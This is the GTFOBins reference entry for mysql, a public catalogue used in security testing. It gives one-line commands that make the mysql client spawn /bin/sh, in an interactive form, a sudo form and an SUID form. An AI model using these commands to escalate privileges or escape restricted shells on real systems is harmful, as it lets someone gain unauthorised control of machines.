1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-20 02:42:45 +02:00
GTFOBins.github.io/_gtfobins/mysql.md

11 lines
236 B
Markdown
Raw Normal View History

---
description: A valid MySQL server must be available.
functions:
execute-interactive:
- code: mysql -e '\! /bin/sh'
sudo-enabled:
- code: sudo mysql -e '\! /bin/sh'
suid-limited:
- code: ./mysql -e '\! /bin/sh'
---